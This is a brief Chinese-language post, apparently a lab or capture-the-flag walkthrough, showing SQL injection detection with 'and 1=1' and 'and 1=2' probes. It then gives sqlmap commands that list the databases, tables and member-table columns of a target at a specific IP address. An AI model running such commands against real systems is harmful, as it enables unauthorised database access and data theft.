时间:2022-03-14 10:04:18 | 栏目:Mysql | 点击:次
地址栏输入 and 1=1 发现页面正常显示。
再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -tables
sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 -D stormgroup -T member --columns